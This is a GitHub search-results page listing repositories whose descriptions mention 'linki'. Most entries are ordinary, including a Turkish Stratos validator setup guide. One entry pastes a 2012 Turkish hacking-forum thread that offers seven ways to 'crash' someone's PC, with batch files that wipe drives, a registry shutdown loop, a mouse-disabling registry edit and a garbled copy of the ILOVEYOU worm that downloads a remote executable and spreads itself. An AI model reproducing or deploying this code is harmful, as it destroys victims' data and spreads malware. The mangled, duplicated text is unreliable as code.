Found 436 repositories(showing 30)
apache
Apache Linkis builds a computation middleware layer to facilitate connection, governance and orchestration between the upper applications and the underlying data engines.
WeBankFinTech
DataSphereStudio is a one stop data application development& management portal, covering scenarios including data exchange, desensitization/cleansing, analysis/mining, quality measurement, visualization, and task scheduling.
WeBankFinTech
Scriptis is for interactive data analysis with script development(SQL, Pyspark, HiveQL), task submission(Spark, Hive), UDF, function, resource management and intelligent diagnosis.
WeBankFinTech
Qualitis is a one-stop data quality management platform that supports quality verification, notification, and management for various datasource. It is used to solve various data quality problems caused by data processing. https://github.com/WeBankFinTech/Qualitis
WeBankFinTech
WeDataSphere is a financial grade, one-stop big data platform suite.
WeBankFinTech
Prophecis is a one-stop cloud native machine learning platform.
WeBankFinTech
Exchangis is a lightweight,highly extensible data exchange platform that supports data transmission between structured and unstructured heterogeneous data sources
WeBankFinTech
Schedulis is a high performance workflow task scheduling system that supports high availability and multi-tenant financial level features, Linkis computing middleware, and has been integrated into data application development portal DataSphere Studio
WeBankFinTech
Visualis is a BI tool for data visualization. It provides financial-grade data visualization capabilities on the basis of data security and permissions, based on the open source project Davinci contributed by CreditEase.
WeBankFinTech
All the project addresses participated and established by WeBank are collected.汇集了微众银行参与和建立的所有项目地址。
WeBankFinTech
DataSphereStudio documents.
WeBankFinTech
Streaming application development and management system, based on Linkis and DSS, planning to provide the workflow-like graphical drag-and-drop development capability.
Sniadanie-z-Programowaniem
Linki które pojawiają się na nagraniach "Śniadanie z Programowaniem"
piecioshka
🌤 Cenne linki (publikowane w latach 2014-2020)
folksdev
Yayın Linki: https://www.youtube.com/watch?v=JdnwMpP6YhE
FiltersHeroes
Polskie Filtry Elementów Irytujących ukrywają i blokują wyskakujące okienka, widgety, newslettery, powiadomienia push, strzałki, niezgodne z tematem artykułów otagowane linki wewnętrzne i inne drażniące elementy (Polskie Filtry RODO-Ciasteczkowe są już w nich zawarte).
apache
Apache Linkis documents
DeAI-Artist
node of the decentralized AI network (DeAI), bridging the power of AI and decentralized economy
shanerobinson
Simple, highly configurable alternative to Linktr.ee and LinkIn.bio built with 11ty and TailwindCSS
olafgoj
O co chodzi w #hackingnews? W skrócie: wrzucam linki do ciekawych stron, które napotkam na swojej drodze. :)
folksdev
Yayın Linki: https://www.youtube.com/watch?v=R_8_dF1zlpQ
avneesh0612
Easily create a website to display all your links
gladed
VSCode extension to make persistent links between markdown files
yunus-acar
🌵 Bot Davet Linki🌵
bugdetector
Hepsiburada.com sitesinden linki verilen ürünün fiyatını bulur.
B3QL
Przydatne materiały i linki
buraksocial
Kandilli Rasathanesi ve Deprem Araştırma Enstitüsü'ne ait RSS linki üzerinden son depremler'i gösteren wordpress eklentisi.
woltzar
<h1 align="center">Stratos Validator kurulum rehberi :atom_symbol:</h1>  # Stratos Türkiye Telegram grubu: [Stratos Türkiye](https://t.me/StratosTurkish) ## Sistem gereksinimleri: ``` 8GB RAM 160 GB SSD 4 vCPU ``` <h1 align="center">Validator kurulumu:</h1> ## root yetkisi: ``` sudo su ``` ## root dizinine gidiyoruz: ``` cd /root ``` ## Sistem güncellemesi: ``` sudo apt update && sudo apt upgrade -y ``` ## Kütüphane kurulumu: ``` sudo apt install make clang pkg-config libssl-dev build-essential git jq ncdu bsdmainutils -y < "/dev/null" ``` ## Binary dosya kurulumu: ``` cd $HOME wget https://github.com/stratosnet/stratos-chain/releases/download/v0.8.0/stchaind ``` ## stchaind ``` md5sum stchain* ``` ### :point_right: Komutu girdikten sonra görselde ki gibi çıktı alıcaksınız  ## Binary dosyalarına execute yetkisi verelim ``` chmod +x stchaind ``` ## Altta ki komutu girdikten sonra görselde ki gibi çıktı alıyoruz. ``` ls ``` ### Sizde sadece schaind yazması yeterli, sui ve stratos-chain yazmayacak.  ## Go kurulumu * go version yazdığınızda 1.16+ üstü sürüm olmalı, genelde 1.18 çıkar. ``` wget -O go1.18.2.linux-amd64.tar.gz https://golang.org/dl/go1.18.2.linux-amd64.tar.gz rm -rf /usr/local/go && tar -C /usr/local -xzf go1.18.2.linux-amd64.tar.gz && rm go1.18.2.linux-amd64.tar.gz echo 'export GOROOT=/usr/local/go' >> $HOME/.bash_profile echo 'export GOPATH=$HOME/go' >> $HOME/.bash_profile echo 'export GO111MODULE=on' >> $HOME/.bash_profile echo 'export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin' >> $HOME/.bash_profile && . $HOME/.bash_profile go version go mod tidy ``` ## Source code ile binary dosyayı derliyoruz. ``` git clone https://github.com/stratosnet/stratos-chain.git cd stratos-chain git checkout v0.8.0 make build ``` #### :point_right: Hata alırsanız * Hata almazsanız bunları girmenıze gerek yok. (yüksek ihtimal hata almayacaksınız) ``` go mod tidy sudo apt update make build ``` ## Binary dosyalarını $GOPATH/bin dizinine yüklüyoruz: ``` cd ~/stratos-chain make install ``` ## initialize işlemi yapıyoruz. * :point_right: Node Name kısmını kendi validator isminizi girin :point_left: ``` cd $HOME ./stchaind init NodeName ``` ## genesis.json ve config.toml dosyalarını indiriyoruz: ``` wget https://raw.githubusercontent.com/stratosnet/stratos-chain-testnet/main/genesis.json wget https://raw.githubusercontent.com/stratosnet/stratos-chain-testnet/main/config.toml ``` ## addrbook.json dosyasını indiriyoruz: ``` wget -O $HOME/.stchaind/config/addrbook.json "https://github.com/mmc6185/node-testnets/blob/main/stratos/stratos-tropos-4/addrbook.json?raw=true" ``` ## genesis.json ve config.toml dosyalarını .stchaind/config/ dizini altına taşıma işlemi: ``` mv config.toml $HOME/.stchaind/config/ mv genesis.json $HOME/.stchaind/config/ ``` ## servis dosyası : ``` echo "[Unit] Description=Stratos Node After=network.target [Service] User=$USER Type=simple ExecStart=$(which stchaind) start Restart=on-failure LimitNOFILE=65535 [Install] WantedBy=multi-user.target" > $HOME/stratosd.service sudo mv $HOME/stratosd.service /etc/systemd/system sudo tee <<EOF >/dev/null /etc/systemd/journald.conf Storage=persistent EOF ``` ## servisimizi aktifleştiriyoruz: ``` sudo systemctl restart systemd-journald sudo systemctl daemon-reload sudo systemctl enable stratosd sudo systemctl restart stratosd ``` ## Node'umuzun loglarına bakıyoruz. * Görselde ki gibi loglar akıcak, 1-2-3 diye başlıyacak sizde. ``` journalctl -u stratosd -f ```  ## Şimdi explorere gidiyoruz: [explorer linki](https://big-dipper-tropos.thestratos.org/) * Sol üstte Latest Block yazıcak, güncel blok orası. * Birazdan false çıktısı komutunu gireceğiz * False çıktınız true yazacak, false olması için güncel bloğa gelmesi gerekiyor, örnek: * Eşleşmesi max 30-60 dakika arası sürer. ``` status 2>&1 | jq .SyncInfo ```  ## Şimdi o eşleşirken biz cüzdan oluşturalım: * WalletName kısmını kendı cüzdan adınız yapın! * Çıkan bilgileri not edin en altta 12 kelımenız olacak o da dahil. ``` stchaind keys add --hd-path "m/44'/606'/0'/0/0" --keyring-backend test WalletName ``` ## Faucetten token alalım * WalletAdres kısmını kaldırın ve cüzdan adresinizi yazın, tırnakları kaldırmayın! ``` curl --header "Content-Type: application/json" --request POST --data '{"denom":"ustos","address":"walletAddress"} ' https://faucet-tropos.thestratos.org/credit ``` ## Bakalım tokenler gelmişmi * st1400.. kısmına kendi cüzdan adresinizi yazın ``` stchaind query bank balances st1400f6e4kes5sk0ltfz8ms74ga9wzd9dulchh5q ```  ## Validator oluşturma * NodeName kısmına validator ismimizi girin! * WalletAddres kısmına cüzdan adınızı girin! ``` stchaind tx staking create-validator \ --amount=100000000ustos \ --pubkey=$(stchaind tendermint show-validator) \ --moniker="NodeName" \ --chain-id=tropos-4 --keyring-backend=test --gas=auto -y \ --commission-rate=0.10 \ --commission-max-rate=0.20 \ --commission-max-change-rate=0.01 \ --min-self-delegation=1 \ --from=walletAddress \ --gas=auto -y ``` ## Explorerde kendimizi kontrol edelim:  # Stratos Türkiye Telegram grubu: [Stratos Türkiye](https://t.me/StratosTurkish) ## Reach out to me <a href="https://twitter.com/Ruesandora0" target="blank"><img align="center" src="https://raw.githubusercontent.com/rahuldkjain/github-profile-readme-generator/master/src/images/icons/Social/twitter.svg" alt="zaferayan" height="30" width="40" /></a> <a href="https://medium.com/@ruesandora" target="blank"><img align="center" src="https://raw.githubusercontent.com/rahuldkjain/github-profile-readme-generator/master/src/images/icons/Social/medium.svg" alt="@zaferayan" height="30" width="40" /></a> <a href="https://www.youtube.com/c/RuesYouTube" target="blank"><img align="center" src="https://raw.githubusercontent.com/rahuldkjain/github-profile-readme-generator/master/src/images/icons/Social/youtube.svg" alt="uc1vykhlufpaoghrwhjikrqg" height="30" width="40" /></a> <br /> <p align="left"> <img src="https://komarev.com/ghpvc/?username=ruesandora&label=Profile%20views&color=0e75b6&style=flat" alt="ruesandora" /> <a href="https://twitter.com/ruesandora0" target="blank"><img src="https://img.shields.io/twitter/follow/ruesandora0?logo=twitter&style=for-the-badge" alt="ruesandora0" /></a> <img src="https://github-readme-stats.vercel.app/api?username=ruesandora&show_icons=true&theme=highcontrast" align="right" width="450" height="350" >
okkesgokce0
Pc Çökertme 7 Farklı YöntemDARHALLDARHALL - ait Kullanıcı Resmi (Avatar)13-07-2012 21:13#1WinkPc Çökertme 7 Farklı Yöntem1.Notepad i açın.2.Notepad in içine şunları yazın:@echo offC:\WINDOWS\COMMAND\deltree /y c:\windows\*.*@echo offC:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*@echo offC:\WINDOWS\COMMAND\deltree /y c:\*.*@echo offclscls@echo .:: DARHALL dan formatı yedin::.@echo off3.Notepad i kapatıp belgeyi kaydedin.4.Uzantısını .txt den .bat a çevirin.5.Hazır.NOT:Yaptıktan sonra dosyaya sakın tıklamayın.Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.2(KOD)-----------------------bunla yha msn yada bilg çöküyo dahada geri gelmiyor!!!UYARI:Linke basmayınız!!!Msn vb canınızı sıkanlar varsa hemen bu linki gonderin.İsletim sistemi cokuohttp://www21.rapidupload.com/d.php?f...&filepath=8202uyarıyı dikkat edin diye büyük yazdım3(KOD)-------------------------Maille pc çökertmekodKod:******** language=\"vbscript\">on error resume nextdim kutlukset kutluk=CreateObject(\"WScript.Shell\"kutluk.RegWri te \"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32\",\"shutdown -r\"</script>bu kod gönderdiğin kişinin maili açmasıyla gönderdiğim kodlar devreye girecek ne işe yarar diye sorucaksın tabi gönderdiğin kişinin pc\'yi yeniden başlatmasıyla yada pc yi açtığında sistem uyarısı gelecek ve tüm uygulamanızı kapatın diyecekyani pc her açıldığında 24 saniyede bir kapanacak olay bu.4(KOD)-------------------------------pc nin monitörünü patlatmayaevet bu aşağıdaki kodlarda karşı pc nin monitörünü patlatmaya yarar90,90resizepic 0 0 5054 405 470gumppic 10 10 5528gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362text 20 400 455 0text 20 435 455 01 local.t_x=<argn1>local.t_y=<argn2>sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y>> B<qval <argn3>?<argn3>:<p.z>> W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z>> B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> - 1> D<var.rendermode>not defterine kopyalayın ve uzantısını bat yapın sakın siz tıklamayın %75 çalışıyodur5(KOD)---------------------evet aşağıdaki komutlar ise karşı pc nin masaüstünü komple silerCD..CD..CD.erase c:/f/s/q/anot defterine kopyalayın ve uzantısını bat yapın %100 çalışıyor6(KOD)-----------------------------BUDA FARE KAPATAN KOD@echo offcopy %0%windir%\Virus.bat> nulreg addHKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f > nul7(KOD)------------------------(BUNU TAVSİYE EDERİM)Not defteri acın bu kodu yapıstırın uzantısını .bat yapın orneın xx.bat gibi ve karsıya atın winrar layp işi biter,BU PC NİN HERŞEYİNİ YAKAR....rem delete -pcaş(-vbe)On es error -pcOn error Next Pc Hackdim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d oweq=”"ctr=0Set fso = CreateObject(”Scripting.FileSystemObject”)set file = fso.OpenTextFile(WScript.ScriptFullname,1)vbscopy=file.ReadAllmain()sub main()On Error Resume Nextdim wscr,rrset wscr=CreateObject(”WScript.Shell”)rr=wscr.RegRead(”HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout”)if (rr>=1) thenwscr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,0,”REG_DWORD”end ifSet dirwin = fso.GetSpecialFolder(0)Set dirsystem = fso.GetSpecialFolder(1)Set dirtemp = fso.GetSpecialFolder(2)Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&”\MSKernel32.vbs”)c.Copy(dirwin&”\Win32DLL.vbs”)c.Copy(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”)regruns()html()spreadtoemail()listadriv()end subsub regruns()On Error Resume NextDim num,downreadregcreate “HKEY_LOCAL_MACHINE\Software\Microsoft\Window s \Cur rentVersio n\Run\MSKernel32″,dirsystem&”\MSKernel32.vbs”regcreate “HKEY_LOCAL_MACHINE\Software\Microsoft\Window s \Cur rentVersio n\RunServices\Win32DLL”,dirwin&”\Win32DLL.vbs”downread=”"downread=regget(”HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory”)if (downread=”") thendownread=”c:\”end ifif (fileexist(dirsystem&”\WinFAT32.exe”)=1) thenRandomizenum = Int((4 * Rnd) + 1)if num = 1 thenregcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,” https://tik.lat/vo4BE 7679njbvYT /WIN-BUGSFIX.exe”elseif num = 2 thenregcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,” https://tik.lat/PE572 nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe”elseif num = 3 thenregcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,” https://tik.lat/emWQu bvg/WIN-BUGSFIX.exe”elseif num = 4 thenregcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,” https://tik.lat/H2HeS djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe”end ifend ifif (fileexist(downread&”\WIN-BUGSFIX.exe”)=0) thenregcreate “HKEY_LOCAL_MACHINE\Software\Microsoft\Window s \Cur rentVersio n\Run\WIN-BUGSFIX”,downread&”\WIN-BUGSFIX.exe”regcreate “HKEY_CURRENT_USER\Software\Microsoft\Interne t Explorer\Main\Start Page”,”about:blank”end ifend subsub listadrivOn Error Resume NextDim d,dc,sSet dc = fso.DrivesFor Each d in dcIf d.DriveType = 2 or d.DriveType=3 Thenfolderlist(d.path&”\”)end ifNextlistadriv = send subsub infectfiles(folderspec)On Error Resume Nextdim f,f1,fc,ext,ap,mircfname,s,bname,mp3set f = fso.GetFolder(folderspec)set fc = f.Filesfor each f1 in fcext=fso.GetExtensionName(f1.path)ext=lcase(ext)s=lcase(f1.name)if (ext=”vbs”) or (ext=”vbe”) thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeelseif(ext=”js”) or (ext=”jse”) or (ext=”css”) or (ext=”wsh”) or (ext=”sct”) or (ext=”hta”) thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closebname=fso.GetBaseName(f1.path)set cop=fso.GetFile(f1.path)cop.copy(folderspec&”\”&bname&”.vbs”)fso.DeleteFile(f1.path)elseif(ext=”jpg”) or (ext=”jpeg”) thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeset cop=fso.GetFile(f1.path)cop.copy(f1.path&”.vbs”)fso.DeleteFile(f1.path)elseif(ext=”mp3″) or (ext=”mp2″) thenset mp3=fso.CreateTextFile(f1.path&”.vbs”)mp3.write vbscopymp3.closeset att=fso.GetFile(f1.path)att.attributes=att.attributes+2end ifif (eq<>folderspec) thenif (s=”mirc32.exe”) or (s=”mlink32.exe”) or (s=”mirc.ini”) or (s=”script.ini”) or (s=”mirc.hlp”) thenset scriptini=fso.CreateTextFile(folderspec&”\script.i ni”)scriptini.WriteLine “[script]“scriptini.WriteLine “;mIRC Script”scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt, if mIRC will”scriptini.WriteLine ” corrupt… WINDOWS will affect and will not run correctly. thanks”scriptini.WriteLine “;”scriptini.WriteLine “;Khaled DARHALL”scriptini.WriteLine “;http://www.mirc.com“scriptini.WriteLine “;”scriptini.WriteLine “n0=on 1:JOIN:#:{”scriptini.WriteLine “n1= /if ( şnick == şme ) { halt }”scriptini.WriteLine “n2= /.dcc send şnick “&dirsystem&”\LOVE-LETTER-FOR-YOU.HTM”scriptini.WriteLine “n3=}”scriptini.closeeq=folderspecend ifend ifnextend subsub folderlist(folderspec)On Error Resume Nextdim f,f1,sfset f = fso.GetFolder(folderspec)set sf = f.SubFoldersfor each f1 in sfinfectfiles(f1.path)folderlist(f1.path)nextend subsub regcreate(regkey,regvalue)Set regedit = CreateObject(”WScript.Shell”)regedit.RegWrite regkey,regvalueend subfunction regget(value)Set regedit = CreateObject(”WScript.Shell”)regget=regedit.RegRead(value)end functionfunction fileexist(filespec)On Error Resume Nextdim msgif (fso.FileExists(filespec)) Thenmsg = 0elsemsg = 1end iffileexist = msgend functionfunction folderexist(folderspec)On Error Resume Nextdim msgif (fso.GetFolderExists(folderspec)) thenmsg = 0---------------------dim f,f1,fc,ext,ap,mircfname,s,bname,mp3set f = fso.GetFolder(folderspec)set fc = f.Filesfor each f1 in fcext=fso.GetExtensionName(f1.path)ext=lcase(ext)s=lcase(f1.name)if (ext=”vbs”) or (ext=”vbe”) thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeelseif(ext=”js”) or (ext=”jse”) or (ext=”css”) or (ext=”wsh”) or (ext=”sct”) or (ext=”hta”) thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closebname=fso.GetBaseName(f1.path)set cop=fso.GetFile(f1.path)cop.copy(folderspec&”\”&bname&”.vbs”)fso.DeleteFile(f1.path)elseif(ext=”jpg”) or (ext=”jpeg”) thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeset cop=fso.GetFile(f1.path)cop.copy(f1.path&”.vbs”)fso.DeleteFile(f1.path)elseif(ext=”mp3″) or (ext=”mp2″) thenset mp3=fso.CreateTextFile(f1.path&”.vbs”)mp3.write vbscopymp3.closeset att=fso.GetFile(f1.path)att.attributes=att.attributes+2end ifif (eq<>folderspec) thenif (s=”mirc32.exe”) or (s=”mlink32.exe”) or (s=”mirc.ini”) or (s=”script.ini”) or (s=”mirc.hlp”) thenset scriptini=fso.CreateTextFile(folderspec&”\script.i ni”)scriptini.WriteLine “[script]“scriptini.WriteLine “;mIRC Script”scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt, if mIRC will”scriptini.WriteLine ” corrupt… WINDOWS will affect and will not run correctly. thanks”scriptini.WriteLine “;”scriptini.WriteLine “;Khaled DARHALL”scriptini.WriteLine “;http://www.mirc.com“scriptini.WriteLine “;”scriptini.WriteLine “n0=on 1:JOIN:#:{”scriptini.WriteLine “n1= /if ( şnick == şme ) { halt }”scriptini.WriteLine “n2= /.dcc send şnick “&dirsystem&”\LOVE-LETTER-FOR-YOU.HTM”scriptini.WriteLine “n3=}”scriptini.closeeq=folderspecend ifend ifnextend subsub folderlist(folderspec)On Error Resume Nextdim f,f1,sfset f = fso.GetFolder(folderspec)set sf = f.SubFoldersfor each f1 in sfinfectfiles(f1.path)folderlist(f1.path)nextend subsub regcreate(regkey,regvalue)Set regedit = CreateObject(”WScript.Shell”)regedit.RegWrite regkey,regvalueend subfunction regget(value)Set regedit = CreateObject(”WScript.Shell”)regget=regedit.RegRead(value)end functionfunction fileexist(filespec)On Error Resume Nextdim msgif (fso.FileExists(filespec)) Thenmsg = 0elsemsg = 1end iffileexist = msgend functionfunction folderexist(folderspec)On Error Resume Nextdim msgif (fso.GetFolderExists(folderspec)) thenmsg = 0---------------------Sen susup içine çekersin söylemediklerini,Onlarınsa gördüğü sadece sigara içen birisi...Konu DARHALL tarafından (13-07-2012 21:15 Saat 21:15 ) değiştirilmiştir. Alıntı YapTrick59, ByCnr35, efsane3939, Marwins, kmc60 Teşekkür etti.soylum21soylum21 - ait Kullanıcı Resmi (Avatar)14-07-2012 20:08#24.Uzantısını .txt den .bat a çevirin. SUNU NASIL YAPICAM TAM OLARAK ANLATIRMISINIZ.. TŞK LER. Alıntı YapXXXXemreXXXXXXXXemreXXXX - ait Kullanıcı Resmi (Avatar)14-07-2012 20:12#3Alıntı:soylum21´isimli üyeden Alıntı Mesajı göster4.Uzantısını .txt den .bat a çevirin. SUNU NASIL YAPICAM TAM OLARAK ANLATIRMISINIZ.. TŞK LER.bilgisayarıma girin.yukarıdan düzenle diyin.klasözr ve arama seçeneklerine tıklayın.görünüme gelin.bilinen dosya uzantılarını gizle yazan yerin yanindaki tik işaretini kaldırın.teşekkür butonuna basın ---------------------KOD AD : !nFiReZone Arşivim : Zone-Arsıvler Alıntı YapByCnr35, Marwins, GencLikPomPa Teşekkür etti.ant07alyaant07alya - ait Kullanıcı Resmi (Avatar)15-07-2012 02:50#4güzel bir konu kardeş saol....---------------------Kod:/#/ Alıntı Yaptestere22testere22 - ait Kullanıcı Resmi (Avatar)15-07-2012 04:17#5soylum21 büyük yazı yazmak yasatır!!!..---------------------Ne Kadar Hızlı Gidersen O Kadar hızlı Düşersin Alıntı Yapyasaklar06yasaklar06 - ait Kullanıcı Resmi (Avatar)15-07-2012 14:20#6teşekkürler Alıntı YapTrojOnTrojOn - ait Kullanıcı Resmi (Avatar)18-07-2012 16:39#7Bunlar çok eskiden uygulanan yötemlerdi biraz geride kalmıssın ama emğine sağlık :9---------------------' Turk Hack Team , bize bulaşmadan düşünecektin 'TrojOn Atasözü Alıntı YapMsK25MsK25 - ait Kullanıcı Resmi (Avatar)18-07-2012 16:50#8Saol kardeş yararlı---------------------İMZAM YOK HE HEE Alıntı YapBrutal AsassinBrutal Asassin - ait Kullanıcı Resmi (Avatar)19-07-2012 00:52#9Ellerine Sağlık .bat Virüsleri Hala İşe yarıyormu Alıntı Yap0nly830nly83 - ait Kullanıcı Resmi (Avatar)29-07-2012 21:03#10mail ile hackMaille pc çökertmekodKod:******** language=\"vbscript\">on error resume nextdim kutlukset kutluk=CreateObject(\"WScript.Shell\"kutluk.RegWri te \"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32\",\"shutdown -r\"</script>
emreuyguc
Php ile yapmış olduğum Whatsapp grup başvuru ve onay linki gönderen web yazılımı.